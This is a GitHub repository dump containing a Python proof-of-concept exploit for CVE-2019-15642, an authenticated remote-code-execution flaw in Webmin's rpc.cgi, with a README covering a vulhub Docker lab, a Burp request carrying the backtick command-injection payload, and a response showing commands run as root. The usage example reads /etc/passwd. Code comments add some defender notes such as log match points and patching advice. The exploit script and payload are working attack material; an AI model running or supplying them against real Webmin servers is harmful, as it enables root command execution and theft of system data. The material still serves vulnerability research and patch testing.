├── rpc.png ├── webmin.png ├── CVE-2019-15642.jpg ├── CVE-2019-15642.png ├── CVE-2019-15642.py └── README.md /rpc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2019-15642/HEAD/rpc.png -------------------------------------------------------------------------------- /webmin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2019-15642/HEAD/webmin.png -------------------------------------------------------------------------------- /CVE-2019-15642.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2019-15642/HEAD/CVE-2019-15642.jpg -------------------------------------------------------------------------------- /CVE-2019-15642.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2019-15642/HEAD/CVE-2019-15642.png -------------------------------------------------------------------------------- /CVE-2019-15642.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import requests.packages.urllib3 3 | requests.packages.urllib3.disable_warnings() 4 | import sys 5 | import base64 6 | import re 7 | 8 | 9 | banner = ''' 10 | _______ ________ ___ ___ __ ___ __ _____ __ _ _ ___ 11 | / ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ /_ | ____| / /| || |__ \ 12 | | | \ \ / /| |__ ______ ) | | | || | (_) |______| | |__ / /_| || |_ ) | 13 | | | \ \/ / | __|______/ /| | | || |\__, |______| |___ \| '_ \__ _/ / 14 | | |____ \ / | |____ / /_| |_| || | / / | |___) | (_) | | |/ /_ 15 | \_____| \/ |______| |____|\___/ |_| /_/ |_|____/ \___/ |_|____| 16 | 17 | python by jas502n 18 | 19 | Webmin RCE (Need Authorization) 20 | 21 | usage: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd" 22 | ''' 23 | 24 | 
def CVE_2019_15642(url,auth_base64,cmd):
    """Send one authenticated POST to ``<url>/rpc.cgi`` and print the reply.

    The request body starts with ``OBJECT CGI;`` and is followed by
    Perl-looking statements in which ``cmd`` sits between backticks. The
    README's captured exchange shows a MiniServ/1.910 server answering such a
    request with the output of ``id`` as root. The public CVE-2019-15642
    description attributes this to rpc.cgi's ``unserialise_variable``
    evaluating the object name.

    Defender view, based only on what this request contains:
      * Match points for logs and IDS rules: ``POST /rpc.cgi`` and a body
        beginning ``OBJECT CGI;``. The ``User-Agent: webmin`` value is just a
        header set below, so it is a weak signal by itself.
      * The request needs valid Webmin credentials (Basic auth), so the
        exposure is limited to accounts that can log in. Keep RPC access to
        trusted accounts only, and run a Webmin release that addresses
        CVE-2019-15642.

    Args:
        url: Base URL of the Webmin instance; ``/rpc.cgi`` is appended by
            plain string concatenation.
        auth_base64: base64 of ``username:password``, used as the Basic
            ``Authorization`` value.
        cmd: Text placed unescaped between the backticks of the payload.

    Returns:
        None. Results are printed (Python 2 ``print`` statements).

    Raises:
        IndexError: when the status/marker check passes but the regex below
            finds no match (``m[0]`` on an empty list).
    """
    vuln_url = url + '/rpc.cgi'
    headers = {
    "User-Agent":"webmin",
    "Connection":"close",
    "Content-Type":"application/x-www-form-urlencoded",
    "Authorization":"Basic %s"%auth_base64,
    # 70 is the byte length of the README's sample body (the `id` request);
    # it is not recomputed for the payload built below.
    # NOTE(review): requests normally derives Content-Length from the body,
    # so this value is probably never sent as written -- TODO confirm.
    "Content-Length":"70"
    }
    # NOTE(review): `proxies` is never passed to requests.post() below, so
    # this SOCKS setting has no effect on the request.
    proxies = {
    'http': 'socks5h://127.0.0.1:1080',
    'https': "socks5h://127.0.0.1:1080"
    }

    # `%` binds tighter than `+`, so only the second literal is formatted.
    # The raw first literal keeps `\n` as backslash-n for the server side.
    payload = r'OBJECT CGI;print "Content-Type: Test\n\n";'+'$cmd=`%s`;print "$cmd";' % cmd
    print "payload= %s" % payload

    # verify=False skips TLS certificate validation, so the Basic credentials
    # go to whichever endpoint answers. The module-level
    # urllib3.disable_warnings() call hides the warning this would raise.
    r = requests.post(url=vuln_url, data=payload, headers=headers, verify=False)
    # Success is judged by HTTP 200 plus the literal 'Content-type' appearing
    # in the body, i.e. the server's own header line printed after the output.
    if r.status_code ==200 and 'Content-type' in r.text:
        print "\nVuln_Url= %s\n" % vuln_url
        # Capture everything in the body up to the first line reading
        # "Content-type: text/plain". re.S lets `.` span newlines.
        m = re.findall(r"(.+?)\nContent-type: text/plain",r.text,re.S)
        print ">>>Execute Response: \n%s" % m[0]
    else:
        print "No Vuln Exit!"


# Script entry point (Python 2: raw_input, print statements, b64encode on str).
if __name__ == '__main__':
    print banner
    # raw_input echoes what is typed, so the password is visible on screen.
    username=raw_input("Please Input Webmin Username: ")
    password=raw_input("Please Input Webmin Password: ")
    auth = username+':'+password
    auth_base64 = base64.b64encode(auth)
    # base64 is reversible: this line writes the credentials to stdout, so
    # any captured terminal output or log of a run should be treated as secret.
    print '\n>>>Authorization: Basic %s\n' %auth_base64



    # argv is read only after the prompts; a missing argument raises
    # IndexError after the credentials have already been typed.
    url = sys.argv[1]
    cmd = sys.argv[2]

    CVE_2019_15642(url,auth_base64,cmd)
-------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2019-15642 Webmin Remote Code Execution (authenticated) 2 | 3 | ## python Usage: 4 | 5 | `python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd"` 6 | 7 | ![](./CVE-2019-15642.jpg) 8 | 9 | ![](./CVE-2019-15642.png) 10 | 11 | ## 0x01 docker for Webmin 12 | `cd ~/vulhub/webmin/CVE-2019-15107` 13 | 14 | `docker-compose up -d` 15 | 16 | `root@9460493fa985:/# passwd root` 17 | 18 | #### Webmin > username=root,password=root 19 | 20 | ``` 21 | ⚡ root@jas502n  ~/vulhub/webmin/CVE-2019-15107   master  docker-compose up -d 22 | 
Creating network "cve-2019-15107_default" with the default driver 23 | Pulling web (vulhub/webmin:1.910)... 24 | 1.910: Pulling from vulhub/webmin 25 | db0035920883: Pull complete 26 | d3665f2ef942: Pull complete 27 | 08a7da7cdc97: Pull complete 28 | 059181cc3fe2: Pull complete 29 | Digest: sha256:ea48cb0e1393fe0247f910c039aa143bbdd74eaecadc44fbe68d2f7e86e037b3 30 | Status: Downloaded newer image for vulhub/webmin:1.910 31 | Creating cve-2019-15107_web_1 ... done 32 | 33 | ⚡ root@jas502n  ~/vulhub/webmin/CVE-2019-15107   master  docker ps -a 34 | CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 35 | 9460493fa985 vulhub/webmin:1.910 "/docker-entrypoin..." 14 minutes ago Up 14 minutes 0.0.0.0:10000->10000/tcp cve-2019-15107_web_1 36 | 37 | ⚡ root@jas502n  ~/vulhub/webmin/CVE-2019-15107   master  docker exec -it 9460493fa985 /bin/bash 38 | root@9460493fa985:/# ls 39 | 40 | root@9460493fa985:/# passwd root 41 | Enter new UNIX password: 42 | Retype new UNIX password: 43 | passwd: password updated successfully 44 | root@9460493fa985:/# 45 | 46 | 47 | ``` 48 | 49 | 50 | ## 0x02 login for Webmin 51 | ``` 52 | username=root 53 | password=root 54 | >>>Authorization: Basic cm9vdDpyb290 55 | ``` 56 | 57 | ![](./webmin.png) 58 | ![](./rpc.png) 59 | 60 | ## 0x03 Command Execute Burpsuite 61 | 62 | ### Burp Request 63 | ``` 64 | POST /rpc.cgi HTTP/1.1 65 | Host: hk.canyouseeme.cc:10000 66 | User-Agent: webmin 67 | Connection: close 68 | Content-Type: application/x-www-form-urlencoded 69 | Authorization: Basic cm9vdDpyb290 70 | Content-Length: 70 71 | 72 | OBJECT CGI;print "Content-Type: Jas502n\n\n\n";$cmd=`id`;print "$cmd"; 73 | ``` 74 | 75 | ### Burp Response 76 | ``` 77 | HTTP/1.0 200 Document follows 78 | Date: Sun, 1 Sep 2019 09:35:24 GMT 79 | Server: MiniServ/1.910 80 | Connection: close 81 | Content-Type: Jas502n 82 | 83 | 84 | uid=0(root) gid=0(root) groups=0(root) 85 | Content-type: text/plain 86 | 87 | 88 | ``` 89 | 90 | 91 | ## 参考链接 92 | 93 | 
https://twitter.com/chybeta/status/1167617571287289856 94 | 95 | https://github.com/vulhub/vulhub/tree/master/webmin/CVE-2019-15107 96 | --------------------------------------------------------------------------------